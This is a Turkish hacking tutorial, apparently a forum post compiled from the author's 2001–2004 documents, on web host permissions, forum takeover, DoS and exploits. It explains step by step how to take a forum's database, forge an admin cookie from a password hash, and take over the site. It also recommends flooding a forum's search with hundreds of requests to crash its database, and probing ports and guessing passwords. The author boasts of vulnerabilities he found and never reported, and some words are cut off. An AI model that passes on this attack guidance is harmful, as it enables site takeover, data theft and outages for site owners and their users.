Bir klasöre uyguladığınız izin ayarı, sadece o klasör’ün TOC’i içindir. ıçindeki bir dosya bundan etkilenmez. Fakat dosyanın EXECUTE edilebilmesi gibi klasörün durumununda sorulduğu zamanlarda bu önem taşır. Bir dosyanın edit edilmesi demek, o dosyanın silinip yerine bir yenisini yazmaktan farksızdır, bu yüzden Write izni açık olmayan bir klasördeki dosyayı editleyemezsiniz yada klasöre yeni dosya koyamazsınız. Permission ayarlarını bilmeyen yada detaylı bir webmaster için son her zaman 1 adım yakındadır. Nitekim bu ayarları bilmeden “Forum Kuracam” diye ortalığa çıkan ve her ne hikmetse her önüne gelenin forum kurduğu bir ülkede, bu ayarlardan çıkan açıklar önem taşımaktadır.
Eğer bir yerden host almışsanız, o makinada bir hesabınız var demektir ve komut çalıştırabilirsiniz demektir. Bunu yapmak için scriptler birebirdir. Eğer ki SSH yetkiniz varsa bunu SSH Shelli üzerinden yada Telnet varsa onun üzerinden de yapabilirsiniz. Bunu en güzel örneği bir scriptle komut çalıştırmak için PHPde şudur..
PHP
--------------------
<?
system(komut);
?>
--------------------
Bir çok bilimsel bilgisi eksik kişi, bu olayı ASP için düşünerek, bunun bir açık olduğunu sanmaktadır. Ve adına FSO açığı demektedir. Halbuki bu bir açık değildir. Size verilen bir haktır.
şimdi size 2001 yılında yazmış olduğum, Web Hack dökümanından bir alıntı ile konuyu açacağım.
------------------------------------------------------------ ---------------------------------
“......... Bir baktım ki onlarda bizim formumumuz olan IKONBOARD un aynısını kullanıyor. Neyse baktım xxxxx benim türkçeleştirmediği yerleri de türkçeleştirmiş forumun. Bende benim forumdan ve onun forumdan ona PM attım ve bu dosyaları istedim. Bana vereceğini söyledi, aradan vakit geçti dosyaları alamadım çünkü xxxxx sanıyorum ki evinde değilmiş şehir dışındaymış.
Bende baktım olmuyor bekle bekle, Allah'a şükür bu işlerden anladığım için hemen yapmam gerekeni yaptım ve onun bana yollayacağı dosyaları kendim aldım... nasıl mı?
Ben ikonboard'un dil dosyalarını falan nereye kurduğunu biliyorum. Yani tüm klasörlerin nerede ve hangi isimle olduğunu biliyorum. Çünkü bende ikonboard kullanıyorum. Bende madem öyle dedim, ve forumun dil dosyalarını indirmeye başladım yaptığım şu idi. Mesela hata mesajlarını bulunduran dil dosyasını istiyorsam http://www.siteadı.com/cgi-bin/ikon3/...en/ErrorWords.p m yazmam yeterli. Dan diye ben bu dosyayı download edebiliyorum.
ışte ben böylece tüm dosyaları download ettim ve gördüm ki onun forum ile benim forum farklı versiyonmuş dosyalar uyuşmadı.
Herneyse ben istediğimi aldım ama iyi bir insan olarak. Peki diyelim ki ben kötü biriyim ve neler yaparım. ılk yapıcağım iş forumun DATABASE dosyasını ele geçirmek olacaktır. Bu sayede ben tüm forumdaki kullanıcılara şifrelere ve maillere ulaşabilirim. Bu kadar basit! Ha bu şifereler HASH edilmiş olacağından siz okuyamazsınız bunları. Bunu CRACK etmeniz gerekir. Tabii ben okurum bunları. Olay basit aklını kullanacaksın.
Kendi bilgisayarımdaki COOKıE dosyasını açarım(programla), Forum adminin ID sini ve HASH edilmiş şifresini o databaseden alırım ve kendi COOKıE dosyama koyarım. Forumun sayfasına girince bir bakarım ki ADMıN olarak forumdayım. Daha sonra admin şifresini değiştiririm
Sonrada sitenin tamamını hack ederim. Bu da basit en önce aldığım şifre ile FTP de bir deneme yaparım. Baktım olmuyor, bu forumların File Managerları var, isteyin dosyayı Admin odasından siliyorsun değişitriyosun falan. Ona girerim ve gerisini siz düşünün artık. Bu iş bu kadar kolay! Bütün bir site bir anda ufak bir hata ile elinizin içine düşebilir....”
------------------------------------------------------------ ---------------------------------
Gördüğünüz gibi en ufak hata yada unutkanlık dediğiniz şey bile, bu işi bilen kişilerin eline geçtiği andan bir şeylerin sonu olabilir. Yukarda bahsedilen örnek büyütülerek, aynı host altında bulunan başka sitelerinde zarar görebileceği bir hale sokulabilir! Elbette bu şans gerektiren bir durum olur ama bu tarz olayların yaşanabileceği bir gerçektir.
Host Deface: Bir host gözde abartılacak bir sistem değildir. Hatta çoğu dedicated bir FireWall ile korunmaz bile. Çoğu 3-4 bilgisayardan oluşan amatör düzeyde hostlardır. Sadece bir kaç büyük firma, odalar dolusu büyüklükte Dedicated host makinlarına sahiptir. Ama bu onların açığı olmayacak anlamına gelmez. Açığı buluncak kadar büyük olmasa bile mutlaka saldırılara dayanma sınırları vardır. D.o.S dediğimiz saldırılara karşı bir çoğu kendini bazen yenik halde bulabilir. Hemde var olan FireWalllarıyla beraber. Peki nedir D.o.S?
D.O.S (Denial of Service) dediğimiz ataklar, T1 T3 dediğimiz yüksek bağlantılı makinalar yada basit Win tabanlı ve Dial-up tabanlı makinalar tarafından yapı.. ping gönderme aşırı paket yollama ve BandWitdh dediğimiz sınırlamalı veri transferi dediğimiz olayın üstüne çıkarak Rate Limit Exceded gibi server hataları almamızı ISPden kopmanızı ve bağlantımızın crash olmasını sağlayan NUKE de dediğimiz ataklardır. Bu atakları herkes programa ihtiyaç dumadanda yapabilir ama bu iyi bir bağlantı ve Win atağı değilse Unıx gibi sağlam bir sistem gerektirir. WinXP ve 2000 bu ataklar için önlem almış sistemlerdir ve internete hızlı bağ..ırlar. Daha çok bilgi için Buaraya Bakın. Kısaca D.o.S bir server’a karşılayabileceğinden fazla istek ve paket yollama durumudur. Bu durumda sunucu programı kilitlenir ve iyi kodlanmamış stabil olmayan bir server programı ise hata verip kapanabilir. Ve o site siz bunu yaparken devre dışı kalır. Düşük bağlantılı bir bilgisayar ile yapı.. D.o.S her zaman yüksek bağlantılı makinaları kullanarak olmak zorundadır. Bunun içinde başka bilgisayarlar kullanılır.
D.o.S benzeri başka ataklarda vardır. Bunlarda paket yollama yerine bir URL yada POST metodu için yüzlerce istek üretir. Bunlarda Flood programları denir. Bunların bir link’e tıklanması için hazırlanan versiyonlarına Clicker denir. Bu üç program türünün ve saldırı türününde mantığı aynıdır.
Bir forumun Search bölümüne yapacağınız binlerce istek o forum scriptinin ve hostun size ayrı.. CPU bölümünün, istekleri artık daha geç karşılamasına ve bazende database’in bir hata ile çökmesine neden olabilir. Buda veri kaybı demektir. Bir forum scriptini yavaşlatıp hata vermesini sağlamak için, en güzel yöntem arama kısmında aynı anda yüzlerce arama yaptırmaktır. Çünkü arama işlemi database’i en çok yoran ve tht cpu harcayan işlemdir.
Aynı şekilde çoğu kez bir çok Host makinasında, farkında olmadan açık unutulan Control Panel arayüzleri ve benzeri Shell tarzı, Telnet tarzı sunucular olmaktadır. Bu tarz kullanılmayan sunucuların portlarını bulmak ve portlarından bir mesaj alarak hangi programın çalıştığını bulup şifre denemek, açık denemek en mantıklısıdır.
Bir FTP server’ına bağlandığınızda bazen sizin home klasörünüz dışındaki bir klasöre çıkmanıza izin verilir. Ama çıktığınız klasörlerin içini boş görürsünüz. Eğerki bazı Full Pathler bulursanız, bu tarz serverlar içinde diğer kullanıcıların home klasörlerine ulaşabilirsiniz.
Ayrıca bu kısımda incelenecek bir diğer kısım ise Vulnerabilites dediğimiz, korumanın zayıf noktalarını bize veren programlama hatalarıdır. Örneğin, Apache serverlerinda, kodlamadan çıkan bir hata size o server'a saldırma, sızma gibi imkanlar sağlayabilir. Aynı şekilde sürekli yama çıkarılması nedeniyle yamalı gömleğe dönen Windows 2000 de bulunan bir güvenlik açığı, size bir çok kapıyı açacaktır. Bu tarz açıkları, "securityfocus" gibi güvenlik haber sitelerinden takip edebilir, veya kendiniz sistemde denemeler yaparak yeni açıklar bulabilirsiniz.
Benim kendi kendime deneyerek bulduğum açıklar oldu, hiçbirini de program sahiplerine yada güvenlik haber sitelerine iletmedim. Ancak bu işleri yapıp, bu haberleri veren bir çok kişi bulunmakta. Ve çoğuda News yada Mail gruplarına üyedir. Eğer bir açığı herkesten önce öğrenmek istiyorsanız bu yerlere üye olunuz. Yanlış bilgilerle olduğunuz yerde saymak istemiyorsanız, Türkiye'de ki Hack adı altındaki sitelerin Hiçbirini sıkı bir şekilde takip etmeyiniz.
Çünkü bu siteler yanlış bilgi yanında, sürekli kavga, gürültü ve basit bilindik şeyleri söyleyip, güncel güvenlik gelişmelerini barındırmamaktadır. 2004'ün Mart ayı itibariyle baktığım hiçbir Hack sitesi, kendi adıma söylemem gerekirse, onay verilecek düzeyde değildi.
Bu işlerde ilerlemek isteyenlerin ilk işi, o siteleri bırakmak olmalıdır. Haftada 1-2 kez hepsini kolaçan etmek, sizin açınızdan faydalı olacaktır. Geri kalan vakitte ise sürekli ingilizce kaynaklardan yazılar okuyarak ve düşünüp, uygulama yapmalısınız.
Exploitler: ışin hem bilgili hemde bilgisiz kısmına hitap edebilen tek bölümdür. Exploit ingilizce bir kelime olup, anlamı “Sömürme” dir. Burda sömürülen şey, bir host’un size açmış olduğu yetenek ve olanaklardır. Örneğin bir host size Shell uygulamaları çalıştırmanıza izin veriyorsa ve siz bu izinle bir D.O.S programını saldırı yapmak için kullanıyorsanız bu bir Exploittir. Aynı şekilde, o hostun hack edilmesini sağlayacak, Kernel’e zarar verecek bir program açıyorsanız, yada bir MySQL serverına bulduğunuz şifre ile bir bilgi girecek yada bir bilgi alacaksanız ve o sistemi hack etmeye çalışcaksanız buda bir Exploittir. Kısacası, host’un yetenekleri ile, kendisi dahil olmak üzere, bir sistemde istenmeyen bir iş yapacaksanız, bu Exploittir. Bir hosting firmasından host alırken size bir sözleşme imzalatırlar. Bu sözleşmede, bir program çalıştıramıyacağınız yada bir server daha kuramayacağınız gibi şeyler yazar. Yani tüm host sağlayanlar sizin yapabilecklerinizin farkındadır ama çoğunlukla bu sözleşmeleri okumayan sizler onların farkında olmadığını sanırsınız.
Explotiler internette özellikle *.pl uzantılı Perl scriptleri halinde dolanırlar. Esas görevleri içinde kodlanmış olan şeyleri yapıp size bir kapı açmaktır. Bu işleri bilmeyenler bu hazır scriptleri alır ve kullanırlar. Bilen kişiler ise kendileri düşünüp, bu scriptleri yazarlar. Yukarlarda bir yerde verdiğim bir hosttan tüm userların hack edilmesi örneğinde kişinin yazacağı script yada program bir Exploit niteliği taşır. Çünkü tüm userların home klasöründeki indexleri değiştirmektedir. Ancak bu exploitlerin en güzeli Kernel’in işlevini bozmak için yazılanlarıdır. Öyledir ki, bir dönem WinNT için her normal user’a Administrator yetkileri atayan bir exploit bulunmuştu. Bu exploit açıldığı anda sistemi Unstable yapıp makinanın tekrar başlamasını sağlıyordu. Daha sonra ise kernel deki Permission sistemi bozuluyordu. Fakat burda unutulmaması gereken kısım, exploiti harekete geçirecek olan *.exe dosyasını açabilme yetkinizin olması. Ayrıca o *.exe dosyası da Token Proccess olan Privilige ayarlarını yapabilmeli. Aksi halde bir exploiti çalıştırıp Kernel’e zarar vermek kolay değildir.
Domain Hack: Hack etmeye çalıştığınız sitenin domanini elde etmek, bir şekilde onu devre dışı bırakmak en zor olanıdır. Bunun için bir şekilde domainin şifresi, domainin Registrar’ının açığının yakalanmış olması gerekir. Eğerki böyle bir şey yapılabilirse, o site ömür boyu size ait olabilir. Bunun yöntemleri çok fazla değildir ancak sonuç alma ihtimali az olduğu için fazla üzerinde durulması anlamzsızdır. Ancak böyle bir ihtimal ve yöntemin olduğunu bilmeniz size avantaj sağlayacaktır.
Yukarıda anlatılmış olan 10 yöntem grubundan elbette daha çok yöntem var. Ve hepside yetenek-zeka ikilisine dayanmakta. Ancak benim yukarda yazdığım 10 yöntem bunların en yaygınları. Bazı bir kaç özel, yaygın olmayan ama çok rahat kullanılabilen yöntemlerde var. Ancak onların böyle halka açık bir dökümanda yayınlamam imkansız. Ancak SpyMasterSnake ıleri Düzey üyeleri arasında paylaşılıp, geliştirilebilecek yöntemler bunlar. Bu yöntemlerde geliştikten sonra kullanılması ve anlaşılması kolay hale gelecektir.
Unutmayın ki bu işler sihirle yada değnek ile olmuyor. Herşey bir araştırma ve düşünme sonucunda oluşan şeyler. Bir gün 50 bin yada 150 site hackledik gibi bir site ile karşılaşırsanız şaşırmayın, onlar bu işlere yeni başlamış ve insanları çevrelerine toplamak isteyen kişilerdir. Bilgi almaya giderseniz, eliniz boş dönersiniz, çünkü olmayan bir şeyi almanız zor olur, olsa bile alabileceğiniz meçhuldur
ınbol tht ingilizce çalışın ve dilinizi geliştirin.
Hiçbir yöntemi veya programı (trojan) aşağılamayın, çok ufakta görünse bir açık, sonuçta açıktır ve gün gelip başınıza bela olabilir ingilizcesi iyi olmayan bir yada hiç olmayan birinin, bu işleri yapması kısaca imkansızdır.
evet arkadaşlar eski dökümanlarımdan derlediğim bu paylaşım hack konusunda umarım aydınlatıcı olmuştur